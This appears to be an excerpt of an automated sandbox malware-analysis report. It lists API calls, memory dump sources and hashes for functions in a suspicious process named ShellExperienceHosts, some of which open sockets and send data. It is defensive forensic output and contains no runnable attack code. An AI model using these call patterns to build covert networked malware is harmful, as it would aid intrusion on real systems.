                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BAA
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BB7
                                                                            • EncodePointer.KERNEL32(?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BC4
                                                                            • DecodePointer.KERNEL32(Function_00009929,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009BE5
                                                                            • __calloc_crt.LIBCMT ref: 10009BFA
                                                                            • DecodePointer.KERNEL32(00000000,?,?,100075E2,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009C14
                                                                            • GetCurrentThreadId.KERNEL32 ref: 10009C26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                            • API String ID: 3698121176-3819984048
                                                                            • Opcode ID: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
                                                                            • Instruction ID: 476fdbd6443a42851c863cb18b7173c2f7dcf4e8a02e7ba59ea7a710cfe5bbe7
                                                                            • Opcode Fuzzy Hash: f6145c8d2fc98865c4004398df4a04ed430af6cefd03571db8e2710a2f51a93a
                                                                            • Instruction Fuzzy Hash: 94313B35840A35EAF721DF758D88B1A3EE6EB493A1B14C526E414D72B4FB36D481CF50
                                                                            Function 6C73CE9C Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 240windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C73CED6
                                                                            • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C73CF00
                                                                            • GetCapture.USER32 ref: 6C73CF16
                                                                            • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C73CF25
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Capture
                                                                            • String ID: #32768$AfxOldWndProc423
                                                                            • API String ID: 1665607226-2141921550
                                                                            • Opcode ID: 20e4df5b97c87d5f40095a38a7ba68ccd21b5f8b0ee04d498f71d87b698d4252
                                                                            • Instruction ID: 638860b09066db30bf3e42b701d5ad80eb9c13f1199e0996607fc69d42926fea
                                                                            • Opcode Fuzzy Hash: 20e4df5b97c87d5f40095a38a7ba68ccd21b5f8b0ee04d498f71d87b698d4252
                                                                            • Instruction Fuzzy Hash: C281E271A00239ABDF215F64CE8CFAA7B78AF59759F1001B4F919A7682CB349D01CB94
                                                                            Function 6C710F84 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 397windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C710F8B
                                                                            • GetParent.USER32(?), ref: 6C71104A
                                                                            • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C71106F
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C7110DD
                                                                            • BringWindowToTop.USER32(?), ref: 6C711103
                                                                            • GetParent.USER32(?), ref: 6C711191
                                                                            • GetParent.USER32(?), ref: 6C71121F
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 6C71123F
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 6C711281
                                                                            • UpdateWindow.USER32(?), ref: 6C71128A
                                                                            • GetSystemMenu.USER32(?,00000000), ref: 6C7112EE
                                                                            • GetMenuItemInfoW.USER32(?,0000F060,00000000,00000030), ref: 6C711333
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C71138B
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7113A9
                                                                            • GetParent.USER32(?), ref: 6C7113B2
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 6C7113DF
                                                                              • Part of subcall function 6C713C23: GetParent.USER32(?), ref: 6C713C8A
                                                                              • Part of subcall function 6C713C23: SendMessageW.USER32(?,00000222,?,00000000), ref: 6C713CA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ParentWindow$MessageSend$MenuRectRedraw$BringH_prolog3_InfoInvalidateItemSystemUpdate
                                                                            • String ID: 0
                                                                            • API String ID: 1054027295-4108050209
                                                                            • Opcode ID: ed795cc4d3cf5bac92bf0f39bdb44794f0a202f32d6f528100bd210d8c7a5782
                                                                            • Instruction ID: 6785396a14e7e3c00fb7bf266993dd2ef213ab025073438676f3b0e05ac90ff6
                                                                            • Opcode Fuzzy Hash: ed795cc4d3cf5bac92bf0f39bdb44794f0a202f32d6f528100bd210d8c7a5782
                                                                            • Instruction Fuzzy Hash: 10E1B631B05616EFDF159B60CA5CBADB775BF49318F180239E426ABBD0DB30A815CB90
                                                                            Function 6C76CC1B Relevance: 29.0, APIs: 19, Instructions: 474windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C76CC25
                                                                            • IsWindow.USER32(?), ref: 6C76CCBC
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76CE61
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76CE92
                                                                            • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 6C76CF18
                                                                            • SendMessageW.USER32(?,0000041C,00000000,?), ref: 6C76CF59
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76CFCC
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76CFE2
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76CFFD
                                                                            • GetMenuItemCount.USER32(00000001), ref: 6C76D06C
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76D082
                                                                            • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 6C76D09C
                                                                            • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 6C76CE77
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            • AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 6C76D186
                                                                            • GetWindow.USER32(?,00000005), ref: 6C76D1B6
                                                                            • AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 6C76D231
                                                                            • GetMenuItemCount.USER32(?), ref: 6C76D275
                                                                            • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 6C76D28B
                                                                            • AppendMenuW.USER32(?,00000000,00000000,?), ref: 6C76D2A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Append$CountItem$MessageSendWindow$CtrlH_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 465015882-0
                                                                            • Opcode ID: 4d2b0b9f7edd25d5847e29bfc064217ff0bd461abce9ffa0f2b4ea6155f97915
                                                                            • Instruction ID: b7fce6e6232660a08331e1792b3c753b5e055fa2170b384f0e996a35fcdcc5e9
                                                                            • Opcode Fuzzy Hash: 4d2b0b9f7edd25d5847e29bfc064217ff0bd461abce9ffa0f2b4ea6155f97915
                                                                            • Instruction Fuzzy Hash: 9E02A130A00218DFDF25DB65CA58BADBB75BF45308F2440A9E809A7B91DF31AD45CF94
                                                                            Function 02232D57 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 02232D72
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02232D7E
                                                                            • timeGetTime.WINMM ref: 02232D84
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02232DB1
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02232DDD
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02232DE9
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02232E08
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02232E14
                                                                            • gethostbyname.WS2_32(00000000), ref: 02232E22
                                                                            • htons.WS2_32(?), ref: 02232E44
                                                                            • connect.WS2_32(?,?,00000010), ref: 02232E62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                            • Instruction ID: c83599afeb021e2a00d8e4c566914774c004ea771565e44cb39688bba1454d1e
                                                                            • Opcode Fuzzy Hash: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                            • Instruction Fuzzy Hash: 32617FB1A40304BFE721DFA4CC85FAAB7B9FF48711F104619FA45AB2D0D7B1A9048B64
                                                                            Function 6C8168DA Relevance: 24.4, APIs: 16, Instructions: 395COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C8168E1
                                                                            • GetCursorPos.USER32(?), ref: 6C81699A
                                                                            • IsRectEmpty.USER32(?), ref: 6C8169CE
                                                                            • IsRectEmpty.USER32(?), ref: 6C8169F5
                                                                            • IsRectEmpty.USER32(?), ref: 6C816A17
                                                                            • GetWindowRect.USER32(?,?), ref: 6C816A45
                                                                            • GetWindowRect.USER32(?,?), ref: 6C816A75
                                                                            • PtInRect.USER32(?,?,?), ref: 6C816AC2
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 6C816ADA
                                                                              • Part of subcall function 6C6E693E: __EH_prolog3.LIBCMT ref: 6C6E6945
                                                                              • Part of subcall function 6C6E693E: SetRectEmpty.USER32 ref: 6C6E6A45
                                                                              • Part of subcall function 6C6E693E: SetRectEmpty.USER32(?), ref: 6C6E6A4C
                                                                            • SetRectEmpty.USER32(?), ref: 6C816AFD
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C816C8E
                                                                            • IsRectEmpty.USER32(?), ref: 6C816CAE
                                                                            • IsRectEmpty.USER32(?), ref: 6C816CE1
                                                                            • PtInRect.USER32(?,00000000,00000000), ref: 6C816CF5
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C816D21
                                                                            • IsRectEmpty.USER32(?), ref: 6C816D40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 359163869-0
                                                                            • Opcode ID: fde96ade99ed71408c22db328583604b5b99cee076d8eaa3435bf6f372f546fc
                                                                            • Instruction ID: fa6a383f820a1e1fefc88970810d03086a559e8e3da3160fae589b5b97f02915
                                                                            • Opcode Fuzzy Hash: fde96ade99ed71408c22db328583604b5b99cee076d8eaa3435bf6f372f546fc
                                                                            • Instruction Fuzzy Hash: 29E1D231A04216DFCF25CFA4CA84AAEBBF9FF45308F144569E845EBA45DB31E905CB90
                                                                            Function 6C7BEBA2 Relevance: 24.2, APIs: 16, Instructions: 181windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BEC35
                                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 6C7BEC53
                                                                            • ReleaseCapture.USER32 ref: 6C7BEC9D
                                                                            • GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 6C7BECAD
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BECBF
                                                                            • DispatchMessageW.USER32(?), ref: 6C7BECC6
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BECEC
                                                                            • GetCapture.USER32 ref: 6C7BECFC
                                                                            • ReleaseCapture.USER32 ref: 6C7BED06
                                                                            • PeekMessageW.USER32(?,00000000,00000200,00000209,00000003), ref: 6C7BED1A
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000000), ref: 6C7BED2F
                                                                            • GetMessageW.USER32(?,00000000,?,?), ref: 6C7BED42
                                                                            • TranslateMessage.USER32(?), ref: 6C7BED62
                                                                            • DispatchMessageW.USER32(?), ref: 6C7BED7D
                                                                            • GetCursorPos.USER32(00000000), ref: 6C7BED87
                                                                            • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 6C7BEDA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$Capture$DispatchRelease$CursorSendTranslate
                                                                            • String ID:
                                                                            • API String ID: 605349011-0
                                                                            • Opcode ID: 9bccff67bf7b4ef3c310fb3fefbe76692d090ebd7c723ffe0ae8382673fbbc34
                                                                            • Instruction ID: 4cb0b06797ebc377dcd44350c6344eeafadcd38bc6d86af5a4af6e1a005ab71d
                                                                            • Opcode Fuzzy Hash: 9bccff67bf7b4ef3c310fb3fefbe76692d090ebd7c723ffe0ae8382673fbbc34
                                                                            • Instruction Fuzzy Hash: C0516E70640509BBEB254F20CE89B6DBA39FB46709F1041B9F512A6A80D7B4B850DBE1
                                                                            Function 10004530 Relevance: 24.2, APIs: 16, Instructions: 180threadnetworksleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 1000455A
                                                                            • timeGetTime.WINMM ref: 1000457B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1000459B
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100045BD
                                                                            • SwitchToThread.KERNEL32 ref: 100045D7
                                                                            • SetEvent.KERNEL32(?), ref: 10004620
                                                                            • CloseHandle.KERNEL32(?), ref: 10004644
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 10004668
                                                                            • SetEvent.KERNEL32(?), ref: 10004686
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10004691
                                                                            • WSACloseEvent.WS2_32(?), ref: 1000469F
                                                                            • shutdown.WS2_32(?,00000001), ref: 100046B3
                                                                            • closesocket.WS2_32(?), ref: 100046BD
                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 100046F6
                                                                            • SetLastError.KERNEL32(000005B4), ref: 1000470A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FA44
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 3448239111-0
                                                                            • Opcode ID: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                            • Instruction ID: f154daa7adb366bc59dc3c87c5a832f84626f43c2ad915a7de221fbbd04ec74e
                                                                            • Opcode Fuzzy Hash: 8d79b15aa9448fa8a40132b16a0a16f3e48fc421b71208ac07a5b091827d0d03
                                                                            • Instruction Fuzzy Hash: CC51F4B4600A22EFE311DF60CCC8B99B7A5FF09782F114115E5058B694DB72F8A0CBD5
                                                                            Function 6C7A2BD1 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C7A2C04
                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C7A2C14
                                                                            • EncodePointer.KERNEL32(00000000,?,?), ref: 6C7A2C1D
                                                                            • DecodePointer.KERNEL32(00000000,?,?), ref: 6C7A2C2B
                                                                            • GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C7A2C52
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2C62
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2C96
                                                                            • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A2CC9
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2CD9
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2D16
                                                                            • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C7A2D51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                            • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                            • API String ID: 404278886-1646127487
                                                                            • Opcode ID: 3a3d65a2dfe538a5c3866560f11fa2fd76a4d7634190d431b11c797ea5b87023
                                                                            • Instruction ID: 45c6b21f74c0a66b161ddab63a6d46543519de93f658d546c739cb1df3dbef81
                                                                            • Opcode Fuzzy Hash: 3a3d65a2dfe538a5c3866560f11fa2fd76a4d7634190d431b11c797ea5b87023
                                                                            • Instruction Fuzzy Hash: 41514D71A0021AAFCB14DFA9C988DEF77BDEF48305F100525E905E7651DB34EA0ACBA0
                                                                            Function 6C702DE5 Relevance: 22.8, APIs: 15, Instructions: 254timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 6C702E1F
                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 6C702E59
                                                                            • SetRectEmpty.USER32(?), ref: 6C702EFD
                                                                            • SetRectEmpty.USER32(?), ref: 6C702F0A
                                                                            • GetSystemMetrics.USER32(00000002), ref: 6C702F2F
                                                                            • KillTimer.USER32(?,0000EC16), ref: 6C702FDF
                                                                            • EqualRect.USER32(?,?), ref: 6C702FFC
                                                                            • EqualRect.USER32(?,?), ref: 6C703011
                                                                            • EqualRect.USER32(?,?), ref: 6C703080
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C703095
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030A6
                                                                            • EqualRect.USER32(?,?), ref: 6C7030B9
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030CB
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7030DC
                                                                            • UpdateWindow.USER32(?), ref: 6C7030ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2140115980-0
                                                                            • Opcode ID: fbea844def4981dea85ec87346e48dedb93b4ce8955460e3b118faa4d7fb2aff
                                                                            • Instruction ID: dd3936abdf872de25e1dae404b9969e08a8696431a08d859de1ba65316c9f188
                                                                            • Opcode Fuzzy Hash: fbea844def4981dea85ec87346e48dedb93b4ce8955460e3b118faa4d7fb2aff
                                                                            • Instruction Fuzzy Hash: 6DA11AB2A0061A9FCF11CF64CA88AEE77B9FF49348F144175ED05EB645DB31A941CBA0
                                                                            Function 02234507 Relevance: 22.7, APIs: 15, Instructions: 161threadnetworksleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 02234531
                                                                            • timeGetTime.WINMM ref: 02234552
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02234572
